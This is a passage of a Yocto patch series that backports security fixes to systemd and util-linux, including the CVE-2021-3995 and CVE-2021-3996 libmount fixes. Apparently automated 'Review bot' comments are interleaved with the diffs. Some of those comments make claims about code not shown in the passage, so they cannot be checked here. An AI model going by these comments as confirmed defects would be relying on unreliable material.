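+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
+- if (root_dev && st.st_dev != root_dev->st_dev)
+- continue;
+-
+- subdir_fd = openat(fd, de->d_name, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (subdir_fd < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- /* Stop at mount points */
+- r = fd_is_mount_point(fd, de->d_name, 0);
+- if (r < 0) {
+- if (ret == 0 && r != -ENOENT)
+- ret = r;
+-
+- continue;
+- }
+- if (r > 0)
+- continue;
+-
+- if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+- /* This could be a subvolume, try to remove it */
+-
+- r = btrfs_subvol_remove_fd(fd, de->d_name, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+- if (r < 0) {
+- if (!IN_SET(r, -ENOTTY, -EINVAL)) {
+- if (ret == 0)
+- ret = r;
+-
+- continue;
+- }
+-
+- /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
+- } else
+- /* It was a subvolume, continue. */
+- continue;
+- }
+-
+- /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file
+- * system type again for each directory */
+- r = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+- if (r < 0 && ret == 0)
+- ret = r;
+-
+- if (unlinkat(fd, de->d_name, AT_REMOVEDIR) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+-
+- if (unlinkat(fd, de->d_name, 0) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+- }
++ is_dir =
++ de->d_type == DT_UNKNOWN ? -1 :
++ de->d_type == DT_DIR;
++
++ r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
+ }
++
+ return ret;
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+ int fd, r;
+- struct statfs s;
+
+ assert(path);
+
+@@ -195,9 +210,10 @@
+ if (FLAGS_SET(flags, REMOVE_ROOT)) {
+
+ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
++
+ if (statfs(path, &s) < 0)
+ return -errno;
+-
+ if (is_physical_fs(&s))
+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+ "Attempted to remove files from a disk file system under \"%s\", refusing.",
+@@ -225,3 +241,22 @@
+
+ return r;
+ }
++
++int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
++
++ /* Removes one specific child of the specified directory */
++
++ if (fd < 0)
++ return -EBADF;
++
++ if (!filename_is_valid(name))
++ return -EINVAL;
++
++ if ((flags & (REMOVE_ROOT|REMOVE_MISSING_OK)) != 0) /* Doesn't really make sense here, we are not supposed to remove 'fd' anyway */
++ return -EINVAL;
++
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
++ return -EINVAL;
++
++ return rm_rf_children_inner(fd, name, -1, flags, NULL);
++}
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -13,7 +13,8 @@
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
+ } RemoveFlags;
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev);
++int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
++int rm_rf_child(int fd, const char *name, RemoveFlags flags);
+ int rm_rf(const char *path, RemoveFlags flags);
+
+ /* Useful for usage with _cleanup_(), destroys a directory and frees the pointer */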
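Review bot: `rm_rf_children_inner()` returns the raw result of `fstatat()` and of both `unlinkat()` calls (`if (r < 0) return r;`), which is -1 and not `-errno`; the removed code used `-errno` at each of these calls. The caller's `r != -ENOENT` filter therefore never matches for these three sites, so an entry that disappears during the walk is recorded as a failure, and the value handed back reads as `-EPERM`. Each site should take the form `if (fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW) < 0) return -errno;`, and likewise `if (unlinkat(fd, fname, AT_REMOVEDIR) < 0) return -errno;` and `if (unlinkat(fd, fname, 0) < 0) return -errno;`. Also, in `rm_rf_children()` the `if (r < 0) {` line is removed while its closing `}` stays as context after `return -errno;`, so the braces look unbalanced on the new side unless a later patch in the series rewrites this block.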
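diff --git a/meta/recipes-core/systemd/systemd/systemd-pager.sh b/meta/recipes-core/systemd/systemd/systemd-pager.sh
new file mode 100644
index 0000000000..86e3e0ab78
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/systemd-pager.sh
@@ -0,0 +1,7 @@
+# Systemd expect a color capable pager, however the less provided
+# by busybox is not. This make many interaction with systemd pretty
+# annoying. As a workaround we disable the systemd pager if less
+# is not the GNU version.
+if ! less -V > /dev/null 2>&1 ; then
+ export SYSTEMD_PAGER=
+fi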
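Review bot: The fragment exports an empty `SYSTEMD_PAGER` whenever `less -V` fails, which also overwrites a pager that the user or an earlier profile script has already chosen. Guarding the test, e.g. `if [ -z "${SYSTEMD_PAGER+x}" ] && ! less -V > /dev/null 2>&1 ; then`, keeps an explicit setting. The header comment could also say that an empty `SYSTEMD_PAGER` is what turns the pager off, since that is not obvious from the assignment.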
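diff --git a/meta/recipes-core/systemd/systemd_244.5.bb b/meta/recipes-core/systemd/systemd_244.5.bb
index 8c95648ca0..8b2f47b92f 100644
--- a/meta/recipes-core/systemd/systemd_244.5.bb
+++ b/meta/recipes-core/systemd/systemd_244.5.bb
@@ -18,8 +18,28 @@ SRC_URI += "file://touchscreen.rules \
  file://00-create-volatile.conf \
  file://init \
  file://99-default.preset \
+ file://systemd-pager.sh \
  file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \
  file://0003-implment-systemd-sysv-install-for-OE.patch \
+ file://CVE-2021-33910.patch \
+ file://CVE-2020-13529.patch \
+ file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \
+ file://introduce-ordered_set_clear-free-with-destructor.patch \
+ file://network-add-skeleton-of-request-queue.patch \
+ file://network-merge-link_drop-and-link_detach_from_manager.patch \
+ file://network-also-drop-requests-when-link-enters-linger-state.patch \
+ file://network-fix-Link-reference-counter-issue.patch \
+ file://rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch \
+ file://rm-rf-optionally-fsync-after-removing-directory-tree.patch \
+ file://CVE-2018-21029.patch \
+ file://CVE-2021-3997-1.patch \
+ file://CVE-2021-3997-2.patch \
+ file://CVE-2021-3997-3.patch \
+ file://CVE-2022-3821.patch \
+ file://CVE-2023-26604-1.patch \
+ file://CVE-2023-26604-2.patch \
+ file://CVE-2023-26604-3.patch \
+ file://CVE-2023-26604-4.patch \
  "
 
 # patches needed by musl
@@ -88,6 +108,7 @@ PACKAGECONFIG ??= " \
  timesyncd \
  utmp \
  vconsole \
+ wheel-group \
  xz \
 "
 
@@ -148,6 +169,7 @@ PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native xmlto-native do
 PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
 PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
 PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
+PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
 PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
 PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
 PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
@@ -180,6 +202,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true"
 PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false"
 PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind"
 PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup"
+PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false"
 # Verify keymaps on locale change
 PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon"
 PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz"
@@ -197,10 +220,12 @@ rootlibexecdir = "${rootprefix}/lib"
 EXTRA_OEMESON += "-Dlink-udev-shared=false"
 
 EXTRA_OEMESON += "-Dnobody-user=nobody \
- -Dnobody-group=nobody \
+ -Dnobody-group=nogroup \
  -Drootlibdir=${rootlibdir} \
  -Drootprefix=${rootprefix} \
  -Ddefault-locale=C \
+ -Dsystem-uid-max=999 \
+ -Dsystem-gid-max=999 \
  "
 
 # Hardcode target binary paths to avoid using paths from sysroot
@@ -298,6 +323,9 @@ do_install() {
  # install default policy for presets
  # https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto
  install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset
+
+ # add a profile fragment to disable systemd pager with busybox less
+ install -Dm 0644 ${WORKDIR}/systemd-pager.sh ${D}${sysconfdir}/profile.d/systemd-pager.sh
 }
 
 python populate_packages_prepend (){
@@ -385,9 +413,9 @@ FILES_${PN}-binfmt = "${sysconfdir}/binfmt.d/ \
  ${rootlibexecdir}/systemd/systemd-binfmt \
  ${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \
  ${systemd_unitdir}/system/systemd-binfmt.service"
-RRECOMMENDS_${PN}-binfmt = "kernel-module-binfmt-misc"
+RRECOMMENDS_${PN}-binfmt = "${@bb.utils.contains('PACKAGECONFIG', 'binfmt', 'kernel-module-binfmt-misc', '', d)}"
 
-RRECOMMENDS_${PN}-vconsole-setup = "kbd kbd-consolefonts kbd-keymaps"
+RRECOMMENDS_${PN}-vconsole-setup = "${@bb.utils.contains('PACKAGECONFIG', 'vconsole', 'kbd kbd-consolefonts kbd-keymaps', '', d)}"
 
 
 FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \
@@ -520,6 +548,7 @@ FILES_${PN} = " ${base_bindir}/* \
  ${sysconfdir}/dbus-1/ \
  ${sysconfdir}/modules-load.d/ \
  ${sysconfdir}/pam.d/ \
+ ${sysconfdir}/profile.d/ \
  ${sysconfdir}/sysctl.d/ \
  ${sysconfdir}/systemd/ \
  ${sysconfdir}/tmpfiles.d/ \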
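Review bot: `PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="` is added without a comment and is not part of the default `PACKAGECONFIG`, so images keep whatever fallback DNS servers systemd compiles in unless the distro opts in. A line such as `# Build systemd-resolved without compiled-in fallback DNS servers` above the flag would make the option discoverable for images that must not contact resolvers outside their own network. The long `SRC_URI` addition also mixes CVE-named patches with unnamed prerequisites (`network-*.patch`, `rm-rf-*.patch`, the two `ordered_set` ones); grouping them under a comment that names the fix they prepare would help later CVE triage.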
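diff --git a/meta/recipes-core/udev/eudev_3.2.9.bb b/meta/recipes-core/udev/eudev_3.2.9.bb
index f96f8cbe78..3ae91dee51 100644
--- a/meta/recipes-core/udev/eudev_3.2.9.bb
+++ b/meta/recipes-core/udev/eudev_3.2.9.bb
@@ -1,5 +1,6 @@
 SUMMARY = "eudev is a fork of systemd's udev"
 HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev"
+DESCRIPTION = "eudev is Gentoo's fork of udev, systemd's device file manager for the Linux kernel. It manages device nodes in /dev and handles all user space actions when adding or removing devices."
 LICENSE = "GPLv2.0+ & LGPL-2.1+"
 LICENSE_libudev = "LGPL-2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"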
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d9434..daee5c224b 100644
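--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
 
-SRC_URI = "git://git.yoctoproject.org/update-rc.d"
-SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748"
+SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
+SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
 
 UPSTREAM_CHECK_COMMITS = "1"
 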
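Review bot: The updated `SRC_URI` still fetches over the plain `git://` transport, which has no transport-level authentication or confidentiality, so the full-hash `SRCREV` is the only thing pinning what enters the build. If the server offers it, `SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master;protocol=https"` keeps the fetcher syntax and moves the transfer onto TLS. The new `branch=master` parameter would also benefit from a one-line comment, since the fetcher presumably checks that `SRCREV` is reachable from that branch and an upstream branch rename would then break the fetch.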
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 0e85603d9a..7b780352be 100644
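--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -59,12 +59,13 @@ python util_linux_binpackages () {
  continue
 
  pkg = os.path.basename(os.readlink(file))
- extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1)
+ extras.setdefault(pkg, [])
+ extras[pkg].append(file.replace(dvar, '', 1))
 
  pn = d.getVar('PN')
  for pkg, links in extras.items():
  of = d.getVar('FILES_' + pn + '-' + pkg)
- links = of + links
+ links = of + " " + " ".join(sorted(links))
  d.setVar('FILES_' + pn + '-' + pkg, links)
 }
 
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\
  \
  --disable-bfs --disable-chfn-chsh --disable-login \
  --disable-makeinstall-chown --disable-minix --disable-newgrp \
- --disable-use-tty-group --disable-vipw \
+ --disable-use-tty-group --disable-vipw --disable-raw \
  \
  --without-udev \
  \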
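Review bot: In the `util_linux_binpackages` hunk, the result of `d.getVar('FILES_' + pn + '-' + pkg)` is concatenated without a check, and `getVar` returns `None` for an unset variable, so `of + " " + ...` would raise `TypeError` for a symlink target whose package has no `FILES_` value yet. `of = d.getVar('FILES_' + pn + '-' + pkg) or ""` tolerates that case and keeps the sorted, reproducible ordering this change introduces. The two added lines can also be written as one, `extras.setdefault(pkg, []).append(file.replace(dvar, '', 1))`. The function starts above the hunk, so whether every `pkg` is guaranteed a `FILES_` value cannot be confirmed from here.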
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 0000000000..2b306c435b
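--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,33 @@
+From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 27 Jul 2021 11:58:31 +0200
+Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
+ nmembs
+
+Fix: https://github.com/karelzak/util-linux/issues/1395
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-37600
+Upstream-Status: Backport [1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c]
+
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ sys-utils/ipcutils.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
+index e784c4dcb..18868cfd3 100644
+--- a/sys-utils/ipcutils.c
++++ b/sys-utils/ipcutils.c
+@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
+ {
+ size_t i;
+
+- if (!p || !p->sem_nsems || p->sem_perm.id < 0)
++ if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
+ return;
+
+ p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
+--
+2.25.1
+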
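Review bot: The added guard `p->sem_nsems > SIZE_MAX` in `get_sem_elements()` carries no comment, and where `size_t` is 64 bits wide it can never be true, so it reads as dead code on those targets. Going by the subject line (uint64 nmembs), it is there for targets with a narrower `size_t`, where the count would be truncated on its way into `xcalloc()`; a comment such as `/* sem_nsems is 64-bit: refuse counts that do not fit size_t before allocating */` records that. Compilers with type-limit warnings enabled may flag the comparison on 64-bit builds. The function body continues past the hunk, so how `p->elements` is indexed afterwards is not visible here.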
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
new file mode 100644
index 0000000000..1dcb66ad1d
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
@@ -0,0 +1,139 @@
1From f3db9bd609494099f0c1b95231c5dfe383346929 Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Wed, 24 Nov 2021 13:53:25 +0100
4Subject: [PATCH] libmount: fix UID check for FUSE umount [CVE-2021-3995]
5
6Improper UID check allows an unprivileged user to unmount FUSE
7filesystems of users with similar UID.
8
9Signed-off-by: Karel Zak <kzak@redhat.com>
10
11CVE: CVE-2021-3995
12Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/f3db9bd609494099f0c1b95231c5dfe383346929]
13Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14
15---
16 include/strutils.h | 2 +-
17 libmount/src/context_umount.c | 14 +++---------
18 libmount/src/mountP.h | 1 +
19 libmount/src/optstr.c | 42 +++++++++++++++++++++++++++++++++++
20 4 files changed, 47 insertions(+), 12 deletions(-)
21
22diff --git a/include/strutils.h b/include/strutils.h
23index 6e95707ea9..a84d29594d 100644
24--- a/include/strutils.h
25+++ b/include/strutils.h
26@@ -91,8 +91,8 @@ static inline char *mem2strcpy(char *dest, const void *src, size_t n, size_t nma
27 if (n + 1 > nmax)
28 n = nmax - 1;
29
30+ memset(dest, '\0', nmax);
31 memcpy(dest, src, n);
32- dest[nmax-1] = '\0';
33 return dest;
34 }
35
36diff --git a/libmount/src/context_umount.c b/libmount/src/context_umount.c
37index 173637a15a..8773c65ffa 100644
38--- a/libmount/src/context_umount.c
39+++ b/libmount/src/context_umount.c
40@@ -393,10 +393,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
41 struct libmnt_ns *ns_old;
42 const char *type = mnt_fs_get_fstype(cxt->fs);
43 const char *optstr;
44- char *user_id = NULL;
45- size_t sz;
46- uid_t uid;
47- char uidstr[sizeof(stringify_value(ULONG_MAX))];
48+ uid_t uid, entry_uid;
49
50 *errsv = 0;
51
52@@ -413,11 +410,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
53 optstr = mnt_fs_get_fs_options(cxt->fs);
54 if (!optstr)
55 return 0;
56-
57- if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
58- return 0;
59-
60- if (sz == 0 || user_id == NULL)
61+ if (mnt_optstr_get_uid(optstr, "user_id", &entry_uid) != 0)
62 return 0;
63
64 /* get current user */
65@@ -434,8 +427,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
66 return 0;
67 }
68
69- snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
70- return strncmp(user_id, uidstr, sz) == 0;
71+ return uid == entry_uid;
72 }
73
74 /*
75diff --git a/libmount/src/mountP.h b/libmount/src/mountP.h
76index d43a835418..22442ec55e 100644
77--- a/libmount/src/mountP.h
78+++ b/libmount/src/mountP.h
79@@ -400,6 +400,7 @@ extern const struct libmnt_optmap *mnt_optmap_get_entry(
80 const struct libmnt_optmap **mapent);
81
82 /* optstr.c */
83+extern int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid);
84 extern int mnt_optstr_remove_option_at(char **optstr, char *begin, char *end);
85 extern int mnt_optstr_fix_gid(char **optstr, char *value, size_t valsz, char **next);
86 extern int mnt_optstr_fix_uid(char **optstr, char *value, size_t valsz, char **next);
87diff --git a/libmount/src/optstr.c b/libmount/src/optstr.c
88index 921b9318e7..16800f571c 100644
89--- a/libmount/src/optstr.c
90+++ b/libmount/src/optstr.c
91@@ -1090,6 +1090,48 @@ int mnt_optstr_fix_user(char **optstr)
92 return rc;
93 }
94
95+/*
96+ * Converts value from @optstr addressed by @name to uid.
97+ *
98+ * Returns: 0 on success, 1 if not found, <0 on error
99+ */
100+int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid)
101+{
102+ char *value = NULL;
103+ size_t valsz = 0;
104+ char buf[sizeof(stringify_value(UINT64_MAX))];
105+ int rc;
106+ uint64_t num;
107+
108+ assert(optstr);
109+ assert(name);
110+ assert(uid);
111+
112+ rc = mnt_optstr_get_option(optstr, name, &value, &valsz);
113+ if (rc != 0)
114+ goto fail;
115+
116+ if (valsz > sizeof(buf) - 1) {
117+ rc = -ERANGE;
118+ goto fail;
119+ }
120+ mem2strcpy(buf, value, valsz, sizeof(buf));
121+
122+ rc = ul_strtou64(buf, &num, 10);
123+ if (rc != 0)
124+ goto fail;
125+ if (num > ULONG_MAX || (uid_t) num != num) {
126+ rc = -ERANGE;
127+ goto fail;
128+ }
129+ *uid = (uid_t) num;
130+
131+ return 0;
132+fail:
133+ DBG(UTILS, ul_debug("failed to convert '%s'= to number [rc=%d]", name, rc));
134+ return rc;
135+}
136+
137 /**
138 * mnt_match_options:
139 * @optstr: options string
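Review bot: `mnt_optstr_get_uid()` sends every non-zero result of `mnt_optstr_get_option()` to the `fail:` label, including the documented `1` for "not found", so the debug line reports a failed conversion when the option is simply absent. The format string `"failed to convert '%s'= to number [rc=%d]"` also has a stray `=`. Returning early with `if (rc != 0) return rc;` right after the lookup keeps that log line for real parse and range errors. In `is_fuse_usermount()` the caller maps every non-zero result to `return 0`, which refuses the user unmount on any parse problem; a short comment saying this fail-closed result is intended would help the next reader. Both functions extend beyond their hunks.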
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
new file mode 100644
index 0000000000..1610b5a0fe
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
@@ -0,0 +1,226 @@
1From 018a10907fa9885093f6d87401556932c2d8bd2b Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Tue, 4 Jan 2022 10:54:20 +0100
4Subject: [PATCH] libmount: fix (deleted) suffix issue [CVE-2021-3996]
5
6This issue is related to parsing the /proc/self/mountinfo file allows an
7unprivileged user to unmount other user's filesystems that are either
8world-writable themselves or mounted in a world-writable directory.
9
10The support for "(deleted)" is no more necessary as the Linux kernel does
11not use it in /proc/self/mountinfo and /proc/self/mount files anymore.
12
13Signed-off-by: Karel Zak <kzak@redhat.com>
14
15CVE: CVE-2021-3996
16Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/018a10907fa9885093f6d87401556932c2d8bd2b]
17Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
18
19---
20 libmount/src/tab_parse.c | 5 -----
21 tests/expected/findmnt/filter-options | 1 -
22 tests/expected/findmnt/filter-options-nameval-neg | 3 +--
23 tests/expected/findmnt/filter-types-neg | 1 -
24 tests/expected/findmnt/outputs-default | 3 +--
25 tests/expected/findmnt/outputs-force-tree | 3 +--
26 tests/expected/findmnt/outputs-kernel | 3 +--
27 tests/expected/libmount/tabdiff-mount | 1 -
28 tests/expected/libmount/tabdiff-move | 1 -
29 tests/expected/libmount/tabdiff-remount | 1 -
30 tests/expected/libmount/tabdiff-umount | 1 -
31 tests/expected/libmount/tabfiles-parse-mountinfo | 11 -----------
32 tests/expected/libmount/tabfiles-py-parse-mountinfo | 11 -----------
33 tests/ts/findmnt/files/mountinfo | 1 -
34 tests/ts/findmnt/files/mountinfo-nonroot | 1 -
35 tests/ts/libmount/files/mountinfo | 1 -
36 16 files changed, 4 insertions(+), 44 deletions(-)
37
38diff --git a/libmount/src/tab_parse.c b/libmount/src/tab_parse.c
39index 917779ab6d..4407f9c9c7 100644
40--- a/libmount/src/tab_parse.c
41+++ b/libmount/src/tab_parse.c
42@@ -225,11 +225,6 @@ static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
43 goto fail;
44 }
45
46- /* remove "\040(deleted)" suffix */
47- p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
48- if (p && *p)
49- *p = '\0';
50-
51 s = skip_separator(s);
52
53 /* (6) vfs options (fs-independent) */
54diff --git a/tests/expected/findmnt/filter-options b/tests/expected/findmnt/filter-options
55index 2606bce76b..97b0ead0ad 100644
56--- a/tests/expected/findmnt/filter-options
57+++ b/tests/expected/findmnt/filter-options
58@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
59 /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
60 /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
61 /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
62-/mnt/foo /fooooo bar rw,relatime
63 rc=0
64diff --git a/tests/expected/findmnt/filter-options-nameval-neg b/tests/expected/findmnt/filter-options-nameval-neg
65index 5471d65af1..f0467ef755 100644
66--- a/tests/expected/findmnt/filter-options-nameval-neg
67+++ b/tests/expected/findmnt/filter-options-nameval-neg
68@@ -29,6 +29,5 @@ TARGET SOURCE FSTYPE OPTIO
69 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
70 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
71 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
72-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
73-`-/mnt/foo /fooooo bar rw,relatime
74+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
75 rc=0
76diff --git a/tests/expected/findmnt/filter-types-neg b/tests/expected/findmnt/filter-types-neg
77index 2606bce76b..97b0ead0ad 100644
78--- a/tests/expected/findmnt/filter-types-neg
79+++ b/tests/expected/findmnt/filter-types-neg
80@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
81 /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
82 /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
83 /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
84-/mnt/foo /fooooo bar rw,relatime
85 rc=0
86diff --git a/tests/expected/findmnt/outputs-default b/tests/expected/findmnt/outputs-default
87index 59495797bd..01599355ec 100644
88--- a/tests/expected/findmnt/outputs-default
89+++ b/tests/expected/findmnt/outputs-default
90@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
91 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
92 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
93 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
94-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
95-`-/mnt/foo /fooooo bar rw,relatime
96+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
97 rc=0
98diff --git a/tests/expected/findmnt/outputs-force-tree b/tests/expected/findmnt/outputs-force-tree
99index 59495797bd..01599355ec 100644
100--- a/tests/expected/findmnt/outputs-force-tree
101+++ b/tests/expected/findmnt/outputs-force-tree
102@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
103 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
104 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
105 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
106-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
107-`-/mnt/foo /fooooo bar rw,relatime
